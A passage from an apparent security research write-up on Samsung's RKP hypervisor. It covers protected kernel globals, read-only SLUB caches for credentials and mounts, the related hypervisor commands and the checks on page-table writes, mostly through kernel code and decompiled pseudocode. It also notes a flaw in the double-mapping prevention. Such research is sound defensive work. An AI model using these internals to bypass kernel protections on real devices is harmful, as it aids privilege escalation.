#endif
These sections are part of the kernel's .rodata
section, that is made read-only in the second stage in rkp_set_kernel_rox
.
#define RO_DATA_SECTION(align)
// ...
.rkp_ro : AT(ADDR(.rkp_ro) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start_rkp_ro) = .; \
*(.rkp_ro) \
VMLINUX_SYMBOL(__stop_rkp_ro) = .; \
VMLINUX_SYMBOL(__start_kdp_ro) = .; \
*(.kdp_ro) \
VMLINUX_SYMBOL(__stop_kdp_ro) = .; \
VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .; \
RKP_RO_PGT \
VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .; \
} \
Below is a list of all the global variables that are protected that way.
empty_zero_page
: special page used for zero-initialized data and copy-on-write.unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
bm_pte
, bm_pmd
, bm_pud
: PUDs, PMDs, and PTEs of the fixmap.static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;
sys_sb
, odm_sb
, vendor_sb
, art_sb
, rootfs_sb
: (Samsung) superblocks of mount namespaces to be protected by RKP.struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
struct super_block *rootfs_sb __kdp_ro = NULL;
is_recovery
: (Samsung) indicates the device is in recovery mode.int is_recovery __kdp_ro = 0;
rkp_init_data
: (Samsung) argument structure passed to the rkp_start
.rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
rkp_s_bitmap_ro
, rkp_s_bitmap_dbl
, rkp_s_bitmap_buffer
: (Samsung) the 3 kernel bitmaps we saw in RKP Bitmaps.sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
__check_verifiedboot
: (Samsung) indicates that the VB state is orange.int __check_verifiedboot __kdp_ro = 0;
rkp_cred_enable
: (Samsung) indicates that RKP protects the tasks' credentials.int rkp_cred_enable __kdp_ro = 0;
init_cred
: the credentials of the init
task.struct cred init_cred __kdp_ro = { /* ... */ };
init_sec
: (Samsung) the security context of the init
task.struct task_security_struct init_sec __kdp_ro;
selinux_enforcing
: indicates that SELinux is enforcing and not permissive.int selinux_enforcing __kdp_ro;
selinux_enabled
: indicates that SELinux is enabled.int selinux_enabled __kdp_ro = 1;
selinux_hooks
: array containing all security hooks.static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };
ss_initialized
: indicates that the SELinux policy has been loaded.int ss_initialized __kdp_ro;
RKP not only protects the global variables, but it also protects specific caches of the SLUB allocator by using read-only pages for those. These pages come from the hypervisor page allocator, and not the kernel one. There are 3 caches that are protected that way:
cred_jar_ro
used for allocating struct cred
;tsec_jar
used for allocating struct task_security_struct
;vfsmnt_cache
used for allocating struct vfsmount
.#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR "tsec_jar"
#define VFSMNT_JAR "vfsmnt_cache"
The read-only pages are allocated by the rkp_ro_alloc
function, which invokes the RKP_RKP_ROBUFFER_ALLOC
command.
static inline void *rkp_ro_alloc(void){
u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
if(!addr)
return 0;
return (void *)__phys_to_virt(addr);
}
Unsurprisingly, the allocate_slab
function of the SLUB allocator calls rkp_ro_alloc
if the cache is one of the three mentioned above. It then calls a command to inform RKP of the cache type: RKP_KDP_X50
for cred_jar
, RKP_KDP_X4E
for tsec_jar
, and RKP_KDP_X4F
for vfsmnt_jar
.
static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
// ...
if (s->name &&
(!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR)||
!strcmp(s->name, VFSMNT_JAR))) {
virt_page = rkp_ro_alloc();
if(!virt_page)
goto def_alloc;
page = virt_to_page(virt_page);
oo = s->min;
} else {
// ...
/*
* We modify the following so that slab alloc for protected data
* types are allocated from our own pool.
*/
if (s->name) {
u64 sc,va_page;
va_page = (u64)__va(page_to_phys(page));
if(!strcmp(s->name, CRED_JAR_RO)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, TSEC_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, VFSMNT_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
}
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
// ...
}
The read-only pages are freed by the rkp_ro_free
function, which invokes the RKP_RKP_ROBUFFER_FREE
command.
static inline void rkp_ro_free(void *free_addr){
uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}
This function is called from free_ro_pages
in the SLUB allocator, which iterates over all the pages to free. In addition to calling rkp_ro_free
, it also invokes the command RKP_KDP_X48
, which reverts changes made by the RKP_KDP_X50
, RKP_KDP_X4E
, and RKP_KDP_X4F
commands.
static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
unsigned long flags;
unsigned long long sc,va_page;
sc = 0;
va_page = (unsigned long long)__va(page_to_phys(page));
if(is_rkp_ro_page(va_page)){
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
rkp_ro_free((void *)va_page);
va_page += PAGE_SIZE;
}
return;
}
spin_lock_irqsave(&ro_pages_lock,flags);
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
memcg_uncharge_slab(page, order, s);
__free_pages(page, order);
spin_unlock_irqrestore(&ro_pages_lock,flags);
}
And unsurprisingly, the __free_slab
function of the SLUB allocator calls free_ro_pages
if the cache is one of the three mentioned above.
static void __free_slab(struct kmem_cache *s, struct page *page)
{
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
// ...
/* We free the protected pages here. */
if (s->name && (!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))){
free_ro_pages(s,page, order);
return;
}
// ...
}
Because the pages of these caches are read-only, the kernel cannot update the freelist pointer of their objects and needs to call into the hypervisor. That is why the set_freepointer
function of the SLUB allocator invokes the RKP_KDP_X44
command if the cache is one of the three mentioned above.
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
// ...
if (rkp_cred_enable && s->name &&
(!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))) {
uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
(u64)freelist_ptr(s, fp, freeptr_addr), 0);
}
// ...
}
One last feature of RKP related to the SLUB allocator is double-mapping prevention. You might have noticed, in the allocate_slab
and __free_slab
functions, calls to dmap_prot
. It invokes the RKP_KDP_X4A
command to notify the hypervisor that this address is being mapped.
static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
if(rkp_cred_enable)
uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}
The cred_jar_ro
and tsec_jar
caches are created in cred_init
. However, this function also invokes the RKP_KDP_X42
command to inform RKP of the size of the cred
and task_security_struct
structures so that it can handle them properly.
void __init cred_init(void)
{
// ...
#ifdef CONFIG_RKP_KDP
if(rkp_cred_enable) {
cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
if(!cred_jar_ro) {
panic("Unable to create RO Cred cache\n");
}
tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
if(!tsec_jar) {
panic("Unable to create RO security cache\n");
}
// ...
uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
}
#endif /* CONFIG_RKP_KDP */
}
Similarly, the vfsmnt_cache
cache is created in mnt_init
. This function invokes the RKP_KDP_X41
command to inform RKP of the total size and offsets of various fields of the vfsmount
structure.
void __init mnt_init(void)
{
// ...
vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);
if(!vfsmnt_cache)
panic("Failed to allocate vfsmnt_cache \n");
rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
(u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
(u64)offsetof(struct vfsmount,data));
uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
// ...
}
For reference, here is the structure ns_param_t
given as an argument to the command:
typedef struct ns_param {
u32 ns_buff_size;
u32 ns_size;
u32 bp_offset;
u32 sb_offset;
u32 flag_offset;
u32 data_offset;
}ns_param_t;
And the rkp_ns_fill_params
macro used to fill this structure is as follows:
#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data) \
do { \
nsparam.ns_buff_size = (u64)buff_size; \
nsparam.ns_size = (u64)size; \
nsparam.bp_offset = (u64)bp; \
nsparam.sb_offset = (u64)sb; \
nsparam.flag_offset = (u64)flag; \
nsparam.data_offset = (u64)data; \
} while(0)
The mnt_init
function initializing the vfsmnt_cache
cache is called from vfs_caches_init
.
void __init vfs_caches_init(void)
{
// ...
mnt_init();
// ...
}
And the cred_init
function, initializing the cred_jar_ro
and tsec_jar
cache, and the vfs_caches_init
function, are called from start_kernel
.
asmlinkage __visible void __init start_kernel(void)
{
// ...
cred_init();
// ...
vfs_caches_init();
// ...
}
We have summarized which RKP commands are used by the SLUB allocator and for what purpose in the following table:
Command | Function | Description |
---|---|---|
RKP_RKP_ROBUFFER_ALLOC |
rkp_cmd_rkp_robuffer_alloc |
Allocate a read-only page |
RKP_RKP_ROBUFFER_FREE |
rkp_cmd_rkp_robuffer_free |
Free a read-only page |
RKP_KDP_X50 |
rkp_cmd_set_pages_ro_cred_jar |
Mark a slab of cred_jar |
RKP_KDP_X4E |
rkp_cmd_set_pages_ro_tsec_jar |
Mark a slab of tsec_jar |
RKP_KDP_X4F |
rkp_cmd_set_pages_ro_vfsmnt_jar |
Mark a slab of vfsmnt_jar |
RKP_KDP_X48 |
rkp_cmd_ro_free_pages |
Unmark a slab |
RKP_KDP_X44 |
rkp_cmd_cred_set_fp |
Set the freelist pointer inside an object |
RKP_KDP_X4A |
rkp_cmd_prot_dble_map |
Prevent double mapping |
RKP_KDP_X42 |
rkp_cmd_assign_cred_size |
Inform of the cred objects size |
RKP_KDP_X41 |
rkp_cmd_assign_ns_size |
Inform of the ns objects size |
We can now take a look at the hypervisor side of these commands, starting with the functions to allocate and free read-only pages.
rkp_cmd_rkp_robuffer_alloc
simply allocates a page from the hypervisor page allocator (which uses the "robuf" region that we have seen earlier). The ha1
/ha2
stuff is only used by the RKP test module and can be safely ignored.
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
// Request a page from the hypervisor page allocator.
page = page_allocator_alloc_page();
ret_p = regs->x2;
// The following code is only used for testing purposes.
if ((ret_p & 1) != 0) {
if (ha1 != 0 || ha2 != 0) {
rkp_policy_violation("Setting ha1 or ha2 should be done once");
}
ret_p &= 0xfffffffffffffffe;
ha1 = page;
ha2 = page + 8;
}
// If x2 contains a kernel pointer, store the page address into it.
if (ret_p) {
if (!page) {
uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
}
*virt_to_phys_el1(ret_p) = page;
}
// Also store the page address into the x0 register.
regs->x0 = page;
return 0;
}
Similarly, rkp_cmd_rkp_robuffer_alloc
simply gives the page back to the hypervisor page allocator.
int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
// ...
// Sanity-checking on the page address in x2.
if (!regs->x2) {
uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
}
// Convert the VA given by the kernel into a PA.
page = rkp_get_pa(regs->x2);
// Free the page in the hypervisor page allocator.
page_allocator_free_page(page);
return 0;
}
The rkp_cmd_set_pages_ro_cred_jar
, rkp_cmd_set_pages_ro_tsec_jar
, and rkp_cmd_set_pages_ro_tsec_jar
functions are called by the kernel to inform the hypervisor of the cache type that a read-only page has been allocated for. These functions all end up calling rkp_set_pages_ro
, but with different arguments.
The rkp_set_pages_ro
function converts the kernel VA into a PA, then marks the page read-only in the second stage. It then zeroes out the page and marks it with the appropriate type (CRED
, SEC_PTR
, or NS
) in the physmap.
uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
// ...
// Sanity-check: the kernel virtual address must be page-aligned.
if ((regs->x2 & 0xfff) != 0) {
return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
}
// Convert the kernel virtual address into a physical address.
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
// Make the target page read-only in the second stage.
if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
} else {
// Reset the page to avoid leaking previous content.
memset(page, 0xff, 0x1000);
// Compute the corresponding type based on the argument.
switch (type) {
case 0:
type = CRED;
break;
case 1:
type = SEC_PTR;
break;
case 2:
type = NS;
break;
}
// Mark the page in the physmap.
rkp_phys_map_set(page, type);
return rkp_phys_map_unlock(page);
}
return rkp_phys_map_unlock(page);
}
The rkp_cmd_ro_free_pages
function is called to revert the above changes when the page is being freed. It calls rkp_ro_free_pages
, which also converts the kernel VA into a PA and verifies that it is marked with the expected type in the physmap. If everything is good, it makes the page writable in the second stage, zeroes it out again, and marks it as FREE
in the physmap.
uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
// ...
// Sanity-check: the kernel virtual address must be page-aligned.
if ((regs->x2 & 0xfff) != 0) {
return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
}
// Convert the kernel virtual address into a physical address.
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
// Check if the page is marked with the appropriate type in the physmap.
if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
return rkp_phys_map_unlock(page);
}
// Make the target page writable in the second stage.
if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
return rkp_phys_map_unlock(page);
}
// Reset the page to avoid leaking current content.
memset(page, 0, 0x1000);
// Mark the page as `FREE` in the physmap.
rkp_phys_map_set(page, FREE);
return rkp_phys_map_unlock(page);
}
The rkp_cred_set_fp
function is called by the SLUB allocator to change the freelist pointer (pointer to the next free object) of a read-only object. It ensures that the object is marked with the appropriate type in the physmap and that the next freelist pointer is marked with the same type. It does some sanity-checking on the object address and pointer offset before finally updating the freelist pointer within the object.
void rkp_cred_set_fp(saved_regs_t* regs) {
// ...
// Convert the object virtual address into a physical address.
object_pa = rkp_get_pa(regs->x2);
// `offset` is the offset of the freelist pointer in the object.
offset = regs->x3;
// `freelist_ptr` is the value to be written at `offset` in the object.
freelist_ptr = regs->x4;
rkp_phys_map_lock(object_pa);
// Ensure the object is located in one of the 3 caches.
if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(object_pa);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
// If not, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(object_pa);
}
rkp_phys_map_unlock(object_pa);
// If the freelist pointer (next free object) is not NULL.
if (freelist_ptr) {
// Convert the next free object VA into a PA.
freelist_ptr_pa = rkp_get_pa(freelist_ptr);
rkp_phys_map_lock(freelist_ptr_pa);
// Ensure the next free object is also located in one of the 3 caches.
if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
!is_phys_map_ns(freelist_ptr_pa)) {
uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(freelist_ptr_pa);
is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
// If not, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(vafreelist_ptr_par14);
}
rkp_phys_map_unlock(freelist_ptr_pa);
}
// Sanity-checking on the object address within the page and freelist pointer offset.
if (invalid_cred_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
}
// Update the freelist pointer within the object if the checks passed.
else {
*(offset + object_pa) = freelist_ptr;
}
}
The invalid_cred_fp
, invalid_sec_ptr_fp
, and invalid_ns_fp
functions all do the same checks. They ensure the object PA is marked with the appropriate type in the physmap, that the VA is aligned on the object size, and finally that the freelist pointer offset is equal to the object size (which is the case for caches with a constructor).
int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `CRED` in the physmap.
if (!is_phys_map_cred(object_pa) ||
// Ensure the object VA is aligned on the size of the cred structure.
object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
// Ensure the offset is equal to the size of the cred structure.
rkp_cred->CRED_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `SEC_PTR` in the physmap.
if (!is_phys_map_sec_ptr(object_pa) ||
// Ensure the object VA is aligned on the size of the task_security_struct structure.
object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
// Ensure the offset is equal to the size of the task_security_struct structure.
rkp_cred->SP_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
// Ensure the object PA is marked as `NS` in the physmap.
if (!is_phys_map_ns(object_pa) ||
// Ensure the object VA is aligned on the size of the vfsmount structure.
object_va && object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
// Ensure the offset is equal to the size of the vfsmount structure.
rkp_cred->NS_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
The rkp_cmd_prot_dble_map
function is called to inform the hypervisor that one or multiple pages are being mapped or unmapped, with the end goal being to prevent double mapping. This function calls rkp_prot_dble_map
, which sets or unsets the bits of dbl_bitmap
for each page of the region.
saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
// ...
// Sanity-check: the base address must be page-aligned.
address = regs->x2 & 0xfffffffff000;
if (!address) {
return 0;
}
// The value to put in the bitmap (0 = unmapped, 1 = mapped).
val = regs->x4;
if (val > 1) {
uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
return 0;
}
// The order, from which the size of the region can be calculated.
order = regs->x3;
if (order <= 19) {
offset = 0;
size = 0x1000 << order;
// Iterate over all the pages in the target region.
do {
// Set the `dbl_bitmap` value for the current page.
res = rkp_set_map_bitmap(address + offset, val);
if (!res) {
uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
}
offset += 0x1000;
} while (offset < size);
}
}
The attentive reader will have noticed that the kernel function dmap_prot
doesn't call the hypervisor function rkp_prot_dble_map
properly: it doesn't give it its addr
argument, so the arguments are all messed up and nothing works as expected.
The last two functions, rkp_cmd_assign_cred_size
and rkp_cmd_assign_ns_size
, are used by the kernel mainly to tell the hypervisor the size of the structures allocated in the read-only caches.
rkp_cmd_assign_cred_size
calls rkp_assign_cred_size
, which saves the sizes of the cred
and task_security_struct
structures into global variables.
int64_t rkp_assign_cred_size(saved_regs_t* regs) {
// ...
// Save the size of the cred structure in `CRED_BUFF_SIZE`.
cred_jar_size = regs->x2;
rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
// Save the size of the task_security_struct structure in `SP_BUFF_SIZE`.
tsec_jar_size = regs->x3;
rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}
rkp_cmd_assign_ns_size
calls rkp_assign_ns_size
, which saves the size of the vfsmount
structure, and the offsets of various fields of this structure, into the global variable rkp_cred
that we will detail later.
int64_t rkp_assign_ns_size(saved_regs_t* regs) {
// ...
// The global variable must have been allocated.
if (!rkp_cred) {
return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
}
// The argument structure VA is converted into a PA.
nsparam_user = rkp_get_pa(regs->x2);
if (!nsparam_user) {
return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
}
// It is copied into a local variable before extracting the various fields.
memcpy(&nsparam, nsparam_user, sizeof(nsparam));
// Save the size of the vfsmount structure.
ns_buff_size = nsparam.ns_buff_size;
ns_size = nsparam.ns_size;
rkp_cred->NS_BUFF_SIZE = ns_buff_size;
rkp_cred->NS_SIZE = ns_size;
// Ensure the offsets of the fields are smaller than the vfsmount structure size.
if (nsparam.bp_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
sb_offset = nsparam.sb_offset;
if (nsparam.sb_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
flag_offset = nsparam.flag_offset;
if (nsparam.flag_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
data_offset = nsparam.data_offset;
if (nsparam.data_offset > ns_size) {
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
}
// Save the offsets of the various fields of the vfsmount structure.
rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}
In the Page Tables Processing section, we have seen that most of the kernel page tables are made read-only in the second stage. But what happens if the kernel needs to modify its page tables entries? This is what we are going to see in this section.
On the kernel side, the entries are modified for each level in the set_pud
, set_pmd
, and set_pte
functions.
For PUDs and PMDs, set_pud
and set_pmd
first check if the page is protected by the hypervisor by calling the rkp_is_pg_protected
function (that uses the ro_bitmap
). If the page is indeed protected, then they call the RKP_WRITE_PGT1
and RKP_WRITE_PGT2
commands, respectively, instead of performing the write directly.
static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pudp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pudp), "r" (pud)
: "x1", "x2", "memory");
}
#else
*pudp = pud;
#endif
dsb(ishst);
isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pmdp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pmdp), "r" (pmd)
: "x1", "x2", "memory");
}
#else
*pmdp = pmd;
#endif
dsb(ishst);
isb();
}
For PTs, set_pte
also checks if the page is protected, but in addition, it calls rkp_is_pg_dbl_mapped
to check if the physical page is already mapped somewhere else in virtual memory (using the dbl_bitmap
). This way, the kernel can detect double mappings.
static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
/* bug on double mapping */
BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));
if (rkp_is_pg_protected((u64)ptep)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (ptep), "r" (pte)
: "x1", "x2", "memory");
}
#else
*ptep = pte;
#endif
/*
* Only if the new pte is valid and kernel, otherwise TLB maintenance
* or update_mmu_cache() have the necessary barriers.
*/
if (pte_valid_not_user(pte)) {
dsb(ishst);
isb();
}
}
On the hypervisor side, the rkp_cmd_write_pgtx
function simply calls rkp_lxpgt_write
after incrementing a counter.
We will now detail the checks that are performed by the hypervisor when modifying an entry of each page table level.
rkp_l1pgt_write
handles writes to first level tables (or PUDs). It first ensures the PUD is marked as L1
in the physmap, unless RKP is not deferred initialized. It then processes the old descriptor value: blocks are not allowed to be unmapped, tables are processed by the rkp_l2pgt_process_table
function. It then processes the new descriptor value as well: blocks are not allowed to be mapped, and tables are processed by the rkp_l2pgt_process_table
function, and their PXN
bit is set for user PUDs. Finally, the descriptor value is updated.
uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
// ...
// Convert the PUD descriptor PA into a VA.
pudp_pa = rkp_get_pa(pudp);
// Get the old/current value of the PUD descriptor.
pud_old = *pudp_pa;
rkp_phys_map_lock(pudp_pa);
// Ensure the PUD is marked as such in the physmap.
if (!is_phys_map_l1(pudp_pa)) {
// If it is not, but RKP is not deferred initialized, perform the write.
if (!rkp_deferred_inited) {
set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
// Otherwise, trigger a policy violation.
rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
}
// Check if this is a kernel or user PUD using the physmap.
is_kernel = is_phys_map_kernel(pudp_pa);
// The old descriptor was valid.
if (pud_old) {
// The old descriptor was not a table, thus was a block.
if ((pud_old & 0b11) != 0b11) {
// Unmapping a block is not allowed, trigger a policy violation.
rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
}
// The old descriptor was a table, call `rkp_l2pgt_process_table` to process the old PMD.
res = rkp_l2pgt_process_table(pud_old & 0xfffffffff000, (pudp_pa << 27) & 0x7fc0000000, 0 /* free */);
}
// Get the start VA corresponding to the kernel or user page tables.
start_addr = 0xffffff8000000000;
if (!is_kernel) {
start_addr = 0;
}
// The new descriptor is valid.
if (pud_new) {
// Get the VA mapped by the PUD descriptor.
addr = start_addr | (pudp_pa << 27) & 0x7fc0000000;
// The new descriptor is not a table, thus is a block.
if ((pud_new & 0b11) != 0b11) {
